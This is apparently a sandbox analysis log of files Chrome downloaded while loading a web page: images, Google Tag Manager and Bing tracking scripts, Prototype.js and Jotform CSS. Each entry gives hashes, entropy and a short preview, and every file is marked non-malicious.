                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C............................................ .... %...%-))-969KKd...C............................................ .... %...%-))-969KKd......X.X..".........................................C........................!1.A.."Qaq..2..#BR......3b.$Cr...4&S..c..................................4.......................!1.AQ."a.q.2...B...#R...C.............?....R..1\.:v&.>iZ~(.E..B.M..T;....x....b..)T.,Q...ai..V(.@X.Q../.1J.bqC..(.H,F(b.C.
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 300x300, components 3
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):21398
                                                                                                                                                                              Entropy (8bit):7.933299731214495
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:60F83148F2AC6FE80CA1D92C3E45DA60
                                                                                                                                                                              SHA1:23A1BD5203C305F65F0E3E387CFB23ABE1D3395A
                                                                                                                                                                              SHA-256:ED3E8CF565403F558BF3A8FF0340A1CA658DB259FF8707E5D8EAC095AF51FE6B
                                                                                                                                                                              SHA-512:3A181BF724B59A30C66B7F575246B7B36102CB569C3E50CD129DC7F4730A914D983DA7A16CDE570A8FC04A96606EBA83F0FC93CCE644F978288E37229D287F1F
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C.................................................."..."*%%*424DD\...C.................................................."..."*%%*424DD\......,.,..".........................................H........................!..1A."Qa.2q.....#BR..br..$3...4Cc.S....&6Ds..................................A.......................!1..A."Qa..2q...BRr..#3C..$Sbc.....4..............?.......Z(..)h..(...(..(...qZ....4.5..@..V=....;S.R.....2.@:...QE
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 50x50, components 3
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):2287
                                                                                                                                                                              Entropy (8bit):7.151150517371642
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:A82CC4776489E617014F2DB1FD103B9E
                                                                                                                                                                              SHA1:AF4274FE150ED2C05E543829BCFEBC036F44721C
                                                                                                                                                                              SHA-256:94D5AC9AD8CBC5069B2EF6BA6F56BBFD896AD1E1A3A89DD1609A69EAFA88DF2D
                                                                                                                                                                              SHA-512:696F90FF6DBB0CE638AA097E7CBF227BEFCA8B2C4ADA78CF66D9BC1DD0EF3DC74D682FEA577026C2DD081C13CA1476C5A2BB88F98954E6BD6187C36C8AE368DB
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C.................................................."..."*%%*424DD\...C.................................................."..."*%%*424DD\......2.2..".......................................8.........................!..1"AQ..#aq...2Br..$34CRb.................................7.......................1..!A.."Qaq....23Rrs...#4STb..............?.c.0.+0...z..Y ......>51.t.QX..5.^@a..9&X....X......Y[k.".8.uM:,LXM).V(Ay.......p#J..u..m.A..
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ASCII text, with very long lines (3835)
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):224581
                                                                                                                                                                              Entropy (8bit):5.545552560660824
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:1F9C68C7BCBA70A39C8E588A95CFBB1A
                                                                                                                                                                              SHA1:C3F913AA09F7BEBD00293CA457871C77D21E37B8
                                                                                                                                                                              SHA-256:03EEAA8AEFA75225673DC49F5E1CA768EA346F303DB71ACBA19282C35E3849A7
                                                                                                                                                                              SHA-512:B319DB715D14E159B2FFEC94C624CE21A5BEED4CD854BFE2CBF2470DB15A02D855CDBFF5250FBE6F25FBBDDEEE9AD4106E7F6D9C3C4BF3110F17E78C51485A8F
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://www.googletagmanager.com/gtag/js?id=UA-1170872-23
                                                                                                                                                                              Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"1",. . "macros":[{"function":"__e"}],. "tags":[{"function":"__ogt_1p_data_v2","priority":2,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_autoEmailEnabled":true,"vtp_autoPhoneEnabled":false,"vtp_autoAddressEnabled":false,"vtp_isAutoCollectPiiEnabledFlag":false,"tag_id":6},{"function":"__ccd_ga_first","priority":1,"vtp_instanceDestinationId":"UA-1170872-23","tag_id":9},{"function":"__rep","vtp_containerId":"UA-1170872-23","vtp_remoteConfig":["map"],"tag_id":1},{"function":"__zone","vtp_childContainers":["list",["map","publicId","G-9MHXDE8HV9"]],"vtp_inheritParentConfig":true,"vtp_enableConfiguration":false,"tag_id":3},{"function":"__ccd_ga_last","priority":0,"vtp_instanceDestinationId":"UA-1170872-23","tag_id":8}],. "predicates":[{"function":"_eq","arg0":["macro",0],"arg1":"gtm.js"},{"function":"_e
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 340x270, components 3
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):8427
                                                                                                                                                                              Entropy (8bit):7.839730735645336
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:11757572B3849F9299D3DB42615856BF
                                                                                                                                                                              SHA1:E122038E411DE3B2B1047026F3146ECA3F7EEF28
                                                                                                                                                                              SHA-256:3EDFFE2A6F5BF8BD291BF342229C40FFF5207A8229F0AD011B98ADBDB4299AC2
                                                                                                                                                                              SHA-512:148751295D40EBAFE18B425F60D9CF81A66C8E739DD4AAC69E0235C16553F239DAFC14D8126B9DBF2CF91FDB9EED82EDDF695A93C234E2C61E64CFC51A66229B
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C............................."......".$...$.6*&&*6>424>LDDL_Z_||....C............................."......".$...$.6*&&*6>424>LDDL_Z_||.........T.."........................................P.........................!1..3AQqt....."4ars.....#$%2RSTd.....5BCDUbc..u....e..............................,.....................1A.2Q.!3Baq...CR."b..............?.........Q2-mD.F....G...v...9....r...(...Ns:..67Lp..e^.o..`....M......Y.-..[....
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):5693
                                                                                                                                                                              Entropy (8bit):4.759469321618349
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:12A5207FFD8F59E29871FD07DDFB9B06
                                                                                                                                                                              SHA1:1CF63E5A5CBCF1C3CFC68C65F961CAF1D49CB8E8
                                                                                                                                                                              SHA-256:525A03A41CF1A87C6B88A0D671BDF7514376E56D1A0EFECF53CD46E9B404FD83
                                                                                                                                                                              SHA-512:ABDC2C297617B703037C733901A63DE70F417AA0C1602E015E7C36DC2459127FE021D554D540361A009FD6FDD3E670EF014D903EA20C759E61A639259FE3D33E
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://submit.jotform.com/API/form/staticTexts
                                                                                                                                                                              Preview:{"responseCode":200,"message":"success","content":{"confirmEmail":"E-mail does not match","pleaseWait":"Please wait...","validateEmail":"You need to validate this e-mail","confirmClearForm":"Are you sure you want to clear the form","lessThan":"Your score should be less than or equal to","incompleteFields":"There are incomplete required fields. Please complete them.","required":"This field is required.","requireOne":"At least one field required.","requireEveryRow":"Every row is required.","requireEveryCell":"Every cell is required.","email":"Enter a valid e-mail address","alphabetic":"This field can only contain letters","numeric":"This field can only contain numeric values","alphanumeric":"This field can only contain letters and numbers.","cyrillic":"This field can only contain cyrillic characters","url":"This field can only contain a valid URL","currency":"This field can only contain currency values.","fillMask":"Field value must fill mask.","uploadExtensions":"You can only upload fol
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (51384), with no line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):51385
                                                                                                                                                                              Entropy (8bit):5.293328685395304
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:6626C1362840EBFC8F48294E8F023E18
                                                                                                                                                                              SHA1:4EC0DFB37C3E536C1B5EC04B68C9846FDBAF9EEF
                                                                                                                                                                              SHA-256:AABC88A6DB8B22022F96CA88E4F0A7BE426ABEF2B35169A71515A2D55246402A
                                                                                                                                                                              SHA-512:B037A19B52C1047198EC7F19E99066054E454964380E2354239834260D11248E617D6759B944DDF39A25B883C8F430603D8E13097396E2DEDA9BB6905C1CD42A
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:function UET(o){this.stringExists=function(n){return n&&n.length>0};this.domain="bat.bing.com";this.domainCl="bat.bing.net";this.URLLENGTHLIMIT=4096;this.pageLoadEvt="pageLoad";this.customEvt="custom";this.pageViewEvt="page_view";o.Ver=o.Ver!==undefined&&(o.Ver==="1"||o.Ver===1)?1:2;this.uetConfig={};this.uetConfig.consent={enabled:!1,adStorageAllowed:!0,adStorageUpdated:!1,hasWaited:!1,waitForUpdate:0,enforced:!1};this.uetConfig.tcf={enabled:!1,vendorId:1126,hasLoaded:!1,timeoutId:null,gdprApplies:undefined,adStorageAllowed:undefined,measurementAllowed:undefined,personalizationAllowed:undefined};this.uetConfig.cusig={hasLoaded:!1,timeoutId:null,blob:{}};this.beaconParams={};this.supportsCORS=this.supportsXDR=!1;this.paramValidations={string_currency:{type:"regex",regex:/^[a-zA-Z]{3}$/,error:"{p} value must be ISO standard currency code"},number:{type:"num",digits:3,max:999999999999},integer:{type:"num",digits:0,max:999999999999},hct_los:{type:"num",digits:0,max:30},date:{type:"regex",
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ASCII text, with very long lines (5708), with no line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):5708
                                                                                                                                                                              Entropy (8bit):5.935776393910535
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:D08254B1F8D4D62E5D8B2FB8DD4661E4
                                                                                                                                                                              SHA1:07F5A7EC697642E44F99A8FDAC58ED49AEEF751C
                                                                                                                                                                              SHA-256:1775E8E6A4887975648B10CDA40C1BA8E5EBA4AC840EC3C14AB85D97E8114DFE
                                                                                                                                                                              SHA-512:8456EEF3B25178BDF0BA6735851B032CAA1DB1680BD7ACB0D04C12925964D217A899A4BDD17DF14031CF237689D2FCD41C7AFAF3F37DCB7A75330EE1BBCC8A90
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:(function(){var s = {};(function(){var h=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,d){if(a==Array.prototype||a==Object.prototype)return a;a[b]=d.value;return a};function k(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var d=a[b];if(d&&d.Math==Math)return d}throw Error("Cannot find global object");} var m=k(this),p=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",t={},v={};function w(a,b,d){if(!d||a!=null){d=v[b];if(d==null)return a[b];d=a[d];return d!==void 0?d:a[b]}} function x(a,b,d){if(b)a:{var c=a.split(".");a=c.length===1;var e=c[0],g;!a&&e in t?g=t:g=m;for(e=0;e<c.length-1;e++){var f=c[e];if(!(f in g))break a;g=g[f]}c=c[c.length-1];d=p&&d==="es6"?g[c]:null;b=b(d);b!=null&&(a?h(t,c,{configurable:!0,writable:!0,value:b}):b!==d&&(v[c]===void 0&&(a=Math.random()*1E9>>>0,v[c]=p?m.Symbol(c):"$jscp$"+a+"$"+c),h(g,v[c],{co
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ASCII text, with very long lines (2199)
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):129796
                                                                                                                                                                              Entropy (8bit):5.210430292599487
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:F804F62127E351B24C131D521B73A657
                                                                                                                                                                              SHA1:5287AFCBBBDD5C62506EAE2BCFF359C5A7907812
                                                                                                                                                                              SHA-256:FFACE13AE112A253E99FB74EB69FB02CF6698EEE1D8EF55F03FAE545680B128E
                                                                                                                                                                              SHA-512:62468F5BE5D666FBA76BAD61C8B8CE489DD0327271A0EB22153C7B863590CA3F7E3D19BA9AF6C571DA1008D6A3B1632FB4FDE80D631C75EE492EA503D8805AE8
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:var Prototype={Version:'1.7',Browser:(function(){var ua=navigator.userAgent;var isOpera=Object.prototype.toString.call(window.opera)=='[object Opera]';return{IE:!!window.attachEvent&&!isOpera,IE9:('documentMode'in document)&&document.documentMode==9,IE10:('documentMode'in document)&&document.documentMode==10,Opera:isOpera,WebKit:ua.indexOf('AppleWebKit/')>-1,Gecko:ua.indexOf('Gecko')>-1&&ua.indexOf('KHTML')===-1,MobileSafari:/Apple.*Mobile/.test(ua)}})(),BrowserFeatures:{XPath:!!document.evaluate,SelectorsAPI:!!document.querySelector,ElementExtensions:(function(){var constructor=window.Element||window.HTMLElement;return!!(constructor&&constructor.prototype);})(),SpecificElementExtensions:(function(){if(typeof window.HTMLDivElement!=='undefined').return true;var div=document.createElement('div'),form=document.createElement('form'),isSupported=false;if(div['__proto__']&&(div['__proto__']!==form['__proto__'])){isSupported=true;}.div=form=null;return isSupported;})()},jsInlineEvents:['onab
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):29683
                                                                                                                                                                              Entropy (8bit):7.990563849588719
                                                                                                                                                                              Encrypted:true
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:89E7428CF603AB0CEED582B8BE906199
                                                                                                                                                                              SHA1:91A1F8B9B67F554DCF8D3F7A9B5E1613837DD95A
                                                                                                                                                                              SHA-256:09DE1D0DF09CD77CAADD881E69247DF554F2AD4C87BFA02BF23AFA2D5DB8A09C
                                                                                                                                                                              SHA-512:9799075F7C8A90C7D6EF75E81FC01E61C3EEBA773507E245BBD7F81F1596745EEC08F9F9880C93AA4C607C7F965756FCEC4B7BE9764DBA890CCE66F63B062480
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://i.etsystatic.com/8090506/c/1280/1280/0/88/il/cb039b/5836772714/il_600x600.5836772714_2zq3.jpg
                                                                                                                                                                              Preview:....ftypavif....avifmif1miaf....meta.......!hdlr........pict.................pitm........."iloc....D@..................r....#iinf..........infe........av01....jiprp...Kipco....colrnclx...........av1C........ispe.......X...X....pixi............ipma.................r.mdat.....&ey_.....2.... ...A@......R......".;.....Qh.e{..).....:....>j.....z0.......R.................P.)%E....y.$..U.|.n..Lz..G.......{.....GK......6..?h,'._.V..Y..Q.v.......a..0..A...'...7..t....0..*..7mXjs..2.J.o.\.h....#g.P...L9.&.j........V..o2:.+.m.E.Z..I.r.....s&..W!<5..........h.1..U6...K.AH..[.dp5.h#.(<...T..K.?.>x}._..U(t..~n.V...{..!FET.......Xx.5.4.>.>.N.....R...W...euF...y9?.l.E)!......2.Q..,...d..wy.k...d...D."....D)8..f"...`..J.SF...5W<pS...).7........5.1?.<P.V2..~m..c...>..*D......."P.....5..1..h...'..GD....#.D.........1C.]......#..7._"d.D...ht...oz.=O...Q.T\..A..r......E ..S..2x%*h.w...].,..r....~\..N#...@KF.$.u.#...w.0$C.0........./.j.i.cz.@.Q%i..O-".2<i.J...'Q...b.
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 200x200, components 3
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):15782
                                                                                                                                                                              Entropy (8bit):7.910076573861571
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:7705AF2CC3CBEAD841A2AA1A05F55737
                                                                                                                                                                              SHA1:2D84E74E0E8B35903AF5C15B15F24FE0F1D95CB6
                                                                                                                                                                              SHA-256:2E1E348A796F96F669415664C95CC7A5A319E1CBB17B8D731F7EEEB7E156BBD4
                                                                                                                                                                              SHA-512:7FA3F187672A9882672DF08E2AF4C7CE4DACC89BE1B608160D5356F8FAB01FA26BBEF9FFEC39CB618F8F41EF2F8CA7154B9153BD8FDD4767A7B6B83E16A47D21
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C.................................................."..."*%%*424DD\...C.................................................."..."*%%*424DD\..........."........................................D.........................!1A.."Q.aq.#2...BR...3b..$Cr......4DESc.................................6.......................!1.A."Qaq.2B.....R..#....$Sb.............?..YGh......I.1 .}../...D./..0.h..z)`B.._...lt.j...z...F..W....m......bM!.q..b..+}
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 50x50, Suserng: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):990
                                                                                                                                                                              Entropy (8bit):7.785190798456133
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:BA72BDD61A364F782D08831D9E04A32A
                                                                                                                                                                              SHA1:4CCAE5149BE40EF2B89DB3F84D7603374A28545E
                                                                                                                                                                              SHA-256:6CBBA9A05A6D87D54F57DD9FA3B9797BD4A8A20D8DEEB271F7DD4E030E47EC26
                                                                                                                                                                              SHA-512:9CF8F6ECB9011D9607AF2442037EAB5CF08389160F564F5D2BFD85F0A76D88007C1E8402034C81A3F154003A99586B0F21AAF652FEF646106B67DE819065C73A
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://i.etsystatic.com/iusa/272f5f/76602750/iusa_50x50.76602750_qgzl.jpg?version=0
                                                                                                                                                                              Preview:RIFF....WEBPVP8 ....P....*2.2.>y..F$...,..0...@..a1c.....=..............CP...1SS..f].....S.N..q\...}..{..N".....jG...^j..v..g>4r.. ..F...r..H...u.>l.[.1q'......H.C.....a+<.p|ca....|..t....sG..#..........Xow[..#.~.Bq..El.#D......{Lz.~.<..l..<=3.9|..F..W..Z.;.[gtDi.6..Z$c/....O..P.......o..Ev3.s.....o...f..M.|k.g...).<_..._..L...>........A...v.... .1{...+....0..N9......\.K.B....'B.(.{..|....dOr.......2.<.*.a(.....C.....f1...B......l...r.e]..%.%.7#w.......K..b...3...xO......=ns........J...33..'H(9...-..C+A.:.6.zi...cE.h.+%...Fq.L.1..N..z...S..=.....WO..G.....M...s.=.?...i...z.xC3.l`2.B.<.W....E ...[..t#..R]...?.".....S....=...M..).@..F......._..V)W.B!.%.-.........P..E.QE...@.ak.........d.{..B...:..On.!g.W9`...k}.4.mW...t...UK.|.+.i....a.....S.O..1......].......8^.tz..b.yI..E.b.#.t..p....l..,..7U..G.;p.]....).......f..`UeD/U..o.qEy..xS{(.R.GP..K.]..c...-........4......"..p.MN,....I.F+.h..6.=.#..2.W........M..1.\V..3.Q<w..... ...
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ASCII text, with very long lines (404)
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):86821
                                                                                                                                                                              Entropy (8bit):5.088521211933554
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:562AF5C904D400C7D4673BA875F569BB
                                                                                                                                                                              SHA1:B964B17220167F72804A83E73CAD17D2FB3E27C3
                                                                                                                                                                              SHA-256:A7DD4DF79B8BC77FAFD8E5ED631E4CD3C5A6556F97F038A8D54FD2916EF509F3
                                                                                                                                                                              SHA-512:21D62A3C3A34034A6CB9148389D533A7CD3CF5FA947C5EBD2BFC10E003364070C6E6A8DAE5B07A05B7FE53DC5683412F4062D4D6E56CE947DA8B755CD20006B5
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://cdn03.jotfor.ms/css/styles/payment/payment_styles.css?3.3.57813
                                                                                                                                                                              Preview:/* stylelint-disable */./* CORE PAYMENT UI //////////////// */...select_border,..select-area,.#productSearch-input,..select-content,.#coupon-input {. border-color: #c3cad8;. background-color: #fff;.}...form-product-category-item {. border-color: #d9dde4;.}...payment_footer,..p_item_separator {. border-top-color: rgba(195,202,216,.5);.}..form-product-item:not(.show_image).focusedProduct .p_col {. display: flex;. align-items: center;.}..form-product-item:not(.show_image).focusedProduct .p_col,..form-product-item.show_image .p_col {. padding-right: 16px;.}..card-2col .form-product-item,..card-3col .form-product-item {. border-color: rgba(195,202,216,.5);.}..card-2col .form-product-details,..card-3col .form-product-details {. color: #4c71fb;.}.#coupon-button {. border-color: #4c71fb;. background-color: #4c71fb;.}.#coupon-table {. border-spacing: 0;.}.. input.form-product-custom_price,. .form-product-item .custom-recurring-payments {. background: #fff;. background-color: #fff;
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ASCII text, with very long lines (5945)
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):276940
                                                                                                                                                                              Entropy (8bit):5.573298761334052
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:A86EC7A5F50610FB156DA8CD62FF1BB7
                                                                                                                                                                              SHA1:EEA7970C0189343CCFC452371D3D7E00C2F65023
                                                                                                                                                                              SHA-256:66C3975A9C29DA4ED1F6812C8EBC91C83CCBDE0549E12C48EF73A0FD3226DA90
                                                                                                                                                                              SHA-512:6897B2878DDE794FC83CE9CAEF2E74907D43783F1DF2E3508663A0C4C0CCEF0B5CDD7021855F1A9206F9BADE35F805E1873C13A74E68CF5A895B6D775844EC8D
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://www.googletagmanager.com/gtag/js?id=G-9MHXDE8HV9&l=dataLayer&cx=c
                                                                                                                                                                              Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"3",. . "macros":[{"function":"__e"},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_ga_send","priority":6,"vtp_value":true,"tag_id":11},{"function":"__ogt_referral_exclusion","priority":6,"vtp_includeConditions":["list","jotform\\.com"],"tag_id":13},{"function":"__ogt_session_timeout","priority":6,"vtp_sessionMinutes":30,"vtp_sessionHours":0,"tag_id":14},{"function":"__ogt_dma","priority":6,"vtp_delegationMode":"ON","vtp_dmaDefault":"DENIED","tag_id":15},{"function":"__ogt_1p_data_v2","priority":6,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 600x600, components 3
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):70255
                                                                                                                                                                              Entropy (8bit):7.953087375734177
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:779A6F9B6364DEDDBD5F4C561D5A2D72
                                                                                                                                                                              SHA1:0AA4A5B93CC38BFA923C96737BDD3EB2A28F1DA5
                                                                                                                                                                              SHA-256:9135DD89924A386F9627F6FED7614E2B5295C9CA1536DB8B652C63EC9DE48435
                                                                                                                                                                              SHA-512:12D72A1D017A29634CDF0690AA0CE6D2BF9C5AD13437E2064447011AF62018705BD61072767D7A308F0947E17A5609C55676E202A05E980F8A2B6881FCD88BD6
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C............................."......".$...$.6*&&*6>424>LDDL_Z_||....C............................."......".$...$.6*&&*6>424>LDDL_Z_||.......X.X.."........................................>........................!1..A"Qa.q.#2..B..R...3br...$C...S.c.................................6........................!1A.Qa"q...2...R...#B..3b..............?.........+WY.......i..@(....QE.QE..E.P..Q@.QE.QE..E.P..Q@.QE.QE..E.P..Q@.QE.QE..E.P.i..
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):4286
                                                                                                                                                                              Entropy (8bit):2.5369531650259916
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:334646AD0308B69A24FF4D607C193DD0
                                                                                                                                                                              SHA1:B5169F56AA13767F13E14AE2DA83460E1F73E8EC
                                                                                                                                                                              SHA-256:BF449CCEA57C0FE1C3491B0CA5B4EA71CEE4017A50324C8A51633EEFB11E85ED
                                                                                                                                                                              SHA-512:6C36626CCDBDE7FCE81509AB2D5A16485F2E530D70B26A0E8651318954A2454F44A7471025914AA2DCADBB1269C6A0F0564DADD50099C409C8FD8FDC4E2532B2
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
